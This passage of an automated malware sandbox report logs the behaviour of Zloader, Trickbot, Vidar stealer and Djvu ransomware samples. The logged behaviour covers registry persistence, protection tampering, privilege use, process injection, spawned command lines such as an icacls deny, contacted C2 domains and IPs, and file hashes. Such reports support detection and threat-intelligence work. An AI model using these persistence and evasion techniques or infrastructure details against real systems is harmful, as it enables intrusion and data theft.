Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A

Indicator Removal: Clear Persistence

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ai3owwq7y.exe\DisableExceptionChainValidation C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5088 set thread context of 2740 N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\explorer.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Windows\SysWOW64\explorer.exe N/A

Modifies Internet Explorer Protected Mode

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" C:\Windows\SysWOW64\explorer.exe N/A

Modifies Internet Explorer Protected Mode Banner

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" C:\Windows\SysWOW64\explorer.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe

"C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"

C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe

"C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5112 -ip 5112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 1080

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

memory/2740-2-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5088-4-0x0000000000400000-0x000000000049F000-memory.dmp

memory/2740-6-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2740-7-0x00000000022A0000-0x0000000002306000-memory.dmp

memory/2740-3-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2740-0-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5112-9-0x00000000006D0000-0x0000000000B04000-memory.dmp

memory/5112-11-0x00000000006D0000-0x0000000000B04000-memory.dmp

memory/5112-12-0x0000000000E00000-0x0000000000F02000-memory.dmp

memory/5112-14-0x00000000006D0000-0x0000000000B03000-memory.dmp

memory/2740-18-0x0000000002800000-0x0000000002801000-memory.dmp

memory/5112-19-0x0000000002F10000-0x0000000002F12000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

159s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\senate.dll,#1

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1352 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1352 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1352 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\senate.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\senate.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/4328-2-0x0000000000CE0000-0x0000000000D09000-memory.dmp

memory/4328-1-0x0000000000D70000-0x0000000000D9C000-memory.dmp

memory/4328-0-0x0000000000CE0000-0x0000000000D09000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe"

Signatures

Trickbot

trojan banker trickbot

Trickbot family

trickbot

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\wermgr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe

"C:\Users\Admin\AppData\Local\Temp\fee15285c36fa7e28e28c7bb9b4cd3940ef12b9907de59d11ab6e2376416d35.exe"

C:\Windows\system32\wermgr.exe

C:\Windows\system32\wermgr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5016 -ip 5016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 704

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 133.130.81.91.in-addr.arpa udp
MD 185.163.47.157:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 8.8.8.8:53 40.240.123.195.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp
US 195.123.240.40:443 tcp

Files

memory/5016-6-0x00000000024D0000-0x000000000250A000-memory.dmp

memory/5016-5-0x00000000024D0000-0x000000000250A000-memory.dmp

memory/5016-4-0x0000000002410000-0x000000000244C000-memory.dmp

memory/5016-0-0x0000000002490000-0x00000000024CE000-memory.dmp

memory/5016-42-0x0000000002510000-0x00000000025F3000-memory.dmp

memory/5016-43-0x00000000024D0000-0x000000000250A000-memory.dmp

memory/5016-179-0x0000000010000000-0x0000000010003000-memory.dmp

memory/5016-178-0x00000000008F0000-0x00000000008F1000-memory.dmp

memory/1096-182-0x0000023A8A8B0000-0x0000023A8A8B1000-memory.dmp

memory/1096-181-0x0000023A8A710000-0x0000023A8A738000-memory.dmp

memory/5016-183-0x0000000002510000-0x00000000025F3000-memory.dmp

memory/5016-184-0x00000000024D0000-0x000000000250A000-memory.dmp

memory/1096-185-0x0000023A8A710000-0x0000023A8A738000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

158s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\str.dll,#1

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ciavy = "regsvr32.exe /s C:\\Users\\Admin\\AppData\\Roaming\\Dauxp\\ykceuzx.dll" C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2264 set thread context of 3596 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\str.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\str.dll,#1

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 militanttra.at udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2264-0-0x0000000074B72000-0x0000000074B75000-memory.dmp

memory/2264-2-0x0000000074B10000-0x0000000074B9B000-memory.dmp

memory/2264-1-0x0000000074B10000-0x0000000074B9B000-memory.dmp

memory/2264-3-0x0000000074B10000-0x0000000074B9B000-memory.dmp

memory/2264-4-0x0000000074B72000-0x0000000074B75000-memory.dmp

memory/3596-7-0x00000000005A0000-0x00000000005CB000-memory.dmp

memory/2264-9-0x0000000074B10000-0x0000000074B9B000-memory.dmp

memory/3596-11-0x00000000005A0000-0x00000000005CB000-memory.dmp

memory/3596-12-0x00000000005A0000-0x00000000005CB000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

140s

Max time network

162s

Command Line

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe"

Signatures

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads local data of messenger clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe

"C:\Users\Admin\AppData\Local\Temp\전산 및 비전산자료 보존 요청서(20200525)_꼭 확인하시고 자료보존해주세요.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 centos10.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 69.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 centos10.com udp

Files

memory/4532-1-0x0000000000A40000-0x0000000000B40000-memory.dmp

memory/4532-2-0x00000000026A0000-0x0000000002729000-memory.dmp

memory/4532-3-0x0000000000400000-0x000000000048D000-memory.dmp

memory/4532-15-0x0000000000400000-0x000000000088B000-memory.dmp

memory/4532-16-0x0000000000A40000-0x0000000000B40000-memory.dmp

memory/4532-17-0x00000000026A0000-0x0000000002729000-memory.dmp

memory/4532-18-0x0000000000400000-0x000000000048D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe"

Signatures

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Djvu family

djvu

Renames multiple (174) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe

"C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe

"C:\Users\Admin\AppData\Local\Temp\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4340 -ip 4340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1868

C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe

C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe --Task

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4040 -ip 4040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3340 -ip 3340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 1792

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 dell1.ug udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 dell1.ug udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 73.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4340-1-0x0000000006DC0000-0x0000000006E8C000-memory.dmp

memory/4340-2-0x0000000006E90000-0x0000000006FAA000-memory.dmp

memory/4340-3-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\f89826d1-4dc5-4b5f-97ed-4f2e82818dc2\ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3.exe

MD5 d592e787314d1c327dbc2da117e1dc59
SHA1 ba3a26eaa200d53129e304078309758bbb3c95f1
SHA256 ec4f09f82d932cdd40700a74a8875b73a783cbaab1f313286adf615a5336d7d3
SHA512 1e805105ab482c752bd24afa028daa3e7bd83f0258510a6fa2ea0c90eb44d1eec590c926982252dbf3a28bb070befbaea5e78c00d556bd9b380a3c79f1480cf7

memory/4340-16-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4340-15-0x0000000006E90000-0x0000000006FAA000-memory.dmp

memory/4340-14-0x0000000000400000-0x0000000004EE3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 67dc90f66ee215dd0b9d8e0a788ac276
SHA1 d8d891fbe208a2da7c2848d3ac9af1de5be99fcb
SHA256 ee9dab168ef8f4089402b0febb95f14a5b3258f4e2504a90f619041131a86d82
SHA512 711d5d90ea75fddd3fe341745c3c8a0f94b866ab6bc0f9a3fcb7f81fab58536f46eba21dd0ad486af960513924b595290493442228b4a02636a6189be8c75abf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 5b000b189f5387eec1f3217964104c2f
SHA1 eecbada8c2734cd8e6629ea3c4635e883331c037
